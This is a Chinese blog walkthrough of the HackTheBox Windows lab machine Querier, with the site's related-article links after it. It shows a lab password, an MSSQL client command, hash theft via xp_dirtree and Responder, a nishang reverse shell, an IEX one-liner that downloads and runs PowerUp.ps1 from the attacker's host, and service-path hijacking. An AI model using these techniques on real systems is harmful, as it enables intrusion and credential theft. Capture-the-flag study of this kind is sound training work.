No.81-HackTheBox-windows-Querier-Walkthrough渗透学习

最新推荐文章于 2021-02-13 11:19:15 发布
最新推荐文章于 2021-02-13 11:19:15 发布
阅读量378 收藏
点赞数
分类专栏: Hack The box 文章标签: java python 数据库 linux 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34801745/article/details/105214998
版权

**

HackTheBox-windows-Querier-Walkthrough

**

靶机地址:https://www.hackthebox.eu/home/machines/profile/175
靶机难度:中级(5.0/10)
靶机发布日期:2019年5月29日
靶机描述:
Querier is a medium difficulty Windows box which has an Excel spreadsheet in a world-readable file share. The spreadsheet has macros, which connect to MSSQL server running on the box. The SQL server can be used to request a file through which NetNTLMv2 hashes can be leaked and cracked to recover the plaintext password. After logging in, PowerUp can be used to find Administrator credentials in a locally cached group policy file.

作者:大余
时间:2020-03-31
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在这里插入图片描述
可以看到靶机的IP是10.10.10.125…
在这里插入图片描述
在其他常见端口之间有SMB和WinRM,MS-sql也正在运行,这确认该域是HTB.LOCAL…(和昨天那台靶机差不多?)
在这里插入图片描述
查看运行了哪些共享…看到了Reports共享…进去看看
在这里插入图片描述
在reports共享发现了"Currency Volume Report.xlsm"文件…下载到本地发现这好像不是xlsm文件…解压发现存在很多子文件…开始一个一个查看…
在这里插入图片描述
查看vbaProject.bin,在顶部附近找到带有凭据的连接字符串…
Uid=reporting;Pwd=PcwTWTHRwryjc$c6…这是MSsql的ID和密匙…
可以使用impacket mssqlclient模块连接到该靶机的MSSQL下…
在这里插入图片描述
命令:mssqlclient.py -windows-auth reporting:PcwTWTHRwryjc\$c6@10.10.10.125
利用mssqlclient模块进来了…
发现不是SA用户…无权限使用一些常规命令…查看了用户情况,果然是无权限的…
虽然无法使用xp_cmdshell执行命令,但可以通过使用xp_dirtree或xp_fileexist来窃取SQL服务帐户的哈希…
在这里插入图片描述
开启responder,然后xp_dirtree窃取了SQL服务的哈希值…
在这里插入图片描述
通过john破解哈希值…获得了密码…ID是mssql-svc
在这里插入图片描述
通过ID和密匙进来了…
查询后,返回true,可以使用xp_cmdshell
在这里插入图片描述
这里可以开始提权了…利用nishang模块里的Invoke-PowerShellTcp即可
在这里插入图片描述
成功获得反向外壳…
在这里插入图片描述
以为有坑…很正常的就获得了user信息…(和NO80有关系吧,这里的方法和前面的一样~~)
git clone https://github.com/PowerShellMafia/PowerSploit.git
PowerSploit模块功能非常强大…我试过绕过防病毒模块…提权
这里准备利用PowerUp.ps1放到靶机服务器上进行扫描枚举…
在这里插入图片描述
已准备好…
在这里插入图片描述
命令:IEX(New-Object Net.Webclient).downloadString('http://10.10.14.10/PowerUp.ps1'); Invoke-AllChecks
开始枚举…这里发现有点问题,重新执行了下…
在这里插入图片描述
看到管理员凭据已缓存在Groups.xml文件中…
这里根据昨天朋友圈小伙伴的提醒,因为445端口开放着,我这里就使用了psexec.py进行获取shell…
在这里插入图片描述
嗯,成功获得了system管理员权限…
在这里插入图片描述
成功获得了root信息…

方法2:

在这里插入图片描述
Invoke-AllChecks输出中,还可以看到有权写入UsoSvc服务…true
在这里插入图片描述
sc.exe qc UsoSvc检查服务状态…
这里将修改服务的二进制路径…注入NC服务,然后提权…
在这里插入图片描述
在这里插入图片描述
可以看到,获得了管理员权限…但是10秒左右就断开了…
在这里插入图片描述
检查了会,重启服务后…在开启…
还是存在10~20秒自动中断的现象,但是几秒足够获得root信息了…这不影响,确确实实存在该问题!!
这里还可以利用文本形式写入UsoSvc服务中,直接读取任何管理员底层的信息…在谈就到骇客了,谈远了

由于我们已经成功得到root权限查看user.txt和root.txt,因此完成这台中等的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

大余xiyou
关注
专栏目录
0x04HackTheBox系列之Querir 实战
boss111的专栏
05-07 182
一 实验简介 Querir是一个中等难度的windows靶机,我们首先发现一个exlce文件,其中包含有宏脚本,我们在脚本中发现了MSSQL服务器信息。通过这个SQL server可以执行系统命令。我们通过进一步的挖掘,可以找到高权限账户密码。最后我们可以使用Powerup查找本地缓存组策略文件中的管理员凭证,从而获得管理员权限。 目标IP:10.129.222.59 二 使用工具 2.1 mssqlcient.py mssql客户端 2.2 responder服务监听程序 2.3 John
从HTB-Querier靶场看内网渗透
Ms08067安全实验室
07-05 736
文章来源|MS08067 内网安全知识星球本文作者:阿青(Ms08067内网安全小组成员)querier作为htb中的一个靶标环境,其中涉及的⼀些基础知识和工具应用值得学习,对该靶标的渗透...
hackthebox - Querier (SqlServer mssql 渗透 & olevba & group policy passwords 提权)
冬萍子癸水
02-13 496
1、扫描 可见smb和mssql 开了。连web都没有,就这几个端口渗透了 C:\root> nmap -A 10.10.10.125 Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-13 09:36 CST Nmap scan report for 10.10.10.125 (10.10.10.125) Host is up (0.34s latency). Not shown: 996 closed ports PORT STATE S
sqli-labs-master-注入学习靶机
01-19
sqli-labs是一个非常好的学习sql注入的一个游戏教程,是一个印度程序猿的搬砖建造的,对于了解sqlmap的原理很有帮助。
【HTB系列】靶机Querier渗透测试
大方子
07-01 2364
总结与反思: 1. 收集信息要全面 2. 用snmp-check检查snmp目标是否开启这个服务 3. smbmap尝试用匿名用户anonymous来枚举目标的共享资源,可能会枚举成功 4. 使用smbclient连接到smb进行命令操作 5. 使用ole来分析宏 6. 使用mssqlclient.py来连接MSSQL 7. mssqlclient.py开启Windows Aut...
terraform-kubernetes-monitoring-thanos-querier:Thanos查询器服务,用于聚合普罗米修斯实例
04-06
Thanos查询层 查询层负责对您的thanos商店(运行商店api的远程实例)运行PromQL查询。 ┌──────────────────┐ ┌────────────┬─────────┐ ┌────────────┐...
loki-windows-amd64.exe.zip
07-14
《Loki:Windows环境下的日志聚合神器》 在当今的云计算和大数据时代,日志管理成为了企业运维中不可或缺的一部分。Loki,这个名字源于北欧神话中的诡计之神,同样在日志管理领域扮演着至关重要的角色。作为一款...
ENCOR 350-401 New questions.pdf
03-07
在 IGMPv2 设备中,选举 IGMP Querier 的机制是:当多个路由器在同一个 LAN 段中时,每个路由器都会发送一个通用查询消息到所有系统组地址 224.0.0.1,并将其接口地址作为源 IP 地址。然后,每个路由器都会比较收到...
mysql-querier:浏览器控制台中的一个简单的mysql数据库
03-14
docker run --rm -it -p8080:8080 mysql-querier 环境变量 HOST :Web服务器的主机-默认:8080 DB_CONN :数据库连接字符串 USERNAME :基本身份验证用户名-默认: admin 密码:基本身份验证密码-默认: password
靶机漏洞报告.pdf
10-12
该文档 主要是针对靶机做的渗透测试报告,用的扫描工具是OpenVas
靶机-凹丫丫新闻发布系统V4.7修改版asp+sqlserver带注入版
05-19
凹丫丫新闻发布系统V4.7修改版asp+sqlserver带注入版!本人修改的版本去掉sql过滤!内附安装说明!推荐环境windows server 2003 + iis6.0 + asp + sqlserver 2005 express ! include/conn.asp是数据库连接文件自行设置!在数据库中新建一个数据库(名字随意在conn.asp中也要相对修改),然后新建查询把网站目录下的news.sql里面的内容复制到查询里面执行(会提示错误但是是正常的忽略),在iis中设置网站默认页面为default.asp(不是index.asp),如果没有权限打开请给网站文件添加everyone用户加权限和iis用户加权限!还要不会你就去搬砖吧!
渗透测试实战-Fowsniff靶机入侵
大方子
11-27 3997
机安装/下载 Fowsniff靶机下载:https://pan.baidu.com/s/1dvCJijStPYkeGtoSaLyg7A   Kali的IP地址:192.168.100.8 WIN7的IP地址:192.168.100.9     先用nmap 进行探测 发现目标的IP地址为192.168.100.12 然后在进行靶机端口的探测 先从80端口下手看看 ...
【HTB系列】靶机Netmon的渗透测试
大方子
07-11 1713
总结和反思: 1. win中执行powershell的远程代码下载执行注意双引号转义 2. 对powershell代码先转为windows上默认的Unicode编码方式(UTF-16LE)再转为 base64执行,防止代码内容被破坏 3. 学会查CVE漏洞 4. 通过命令行把终端内容保存到剪切板中 5. 运维人员密码修改的规律,仅仅修改了密码中的年份,这是设置新密码常用的思路 K...
【HTB系列】靶机Bitlab的渗透测试
Ms08067安全实验室
02-07 838
本文作者:是大方子(Ms08067实验室核心成员)﹀﹀﹀0x00 本文目录反思与总结基本信息渗透测试过程补充0x01 反思与总结1.curl发送GET参数化请求 2.对反弹回来的s...
GOBUSTER - 目录/文件和DNS爆破工具。
热门推荐
大方子
02-03 3万+
github:https://github.com/OJ/gobuster 常用命令行选项 -fw - 使用通配符结果强制处理域。 -np - 隐藏进度输出。 -m <mode>- 使用哪种模式,dir或者dns(默认:) dir。 -q - 禁用横幅/下划线输出。 -t <threads>- 要运行的线程数(默认值:) 10。 -u <url/dom...
Kali无法连接,SSH服务器拒绝了密码,xshell连不上虚拟机怎么办
大方子
07-22 3230
SSH服务器拒绝了密码,xshell连不上虚拟机怎么办 应该是sshd的设置不允许root用户用密码远程登录  修改 vi /etc/ssh/sshd_config  找到# Authentication:  LoginGraceTime 120  PermitRootLogin without passwd  StrictModes yes  改成 Authentication: Logi...
IIS-PUT漏洞
大方子
07-18 4363
漏洞成因: IIS server在WEB服务拓展中开启了WebDAV,配置了写入权限,脚本资源访问权限。导致任意文件上传 因为开启了WebDev和写入权限,我们可以直接通过PUT的方式写入webshell.txt 这个时候可以看到服务器上有了我们刚刚PUT上去的文件 然后我们需要把这个webshell.txt变成webshell.asp才能运行 如果服务...
vlan 1 igmp-snooping enable igmp-snooping drop-unknown igmp-snooping max-response-time 9 igmp-snooping querier igmp-snooping query-interval 10 igmp-snooping general-query source-ip 40.62.0.254 igmp-snooping special-query source-ip 40.62.0.254
最新发布
06-12
- "igmp-snooping querier"表示启用IGMP Snooping查询器功能。 - "igmp-snooping query-interval 10"表示设置查询间隔为10秒。 - "igmp-snooping general-query source-ip 40.62.0.254"表示使用IP地址40.62.0.254...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值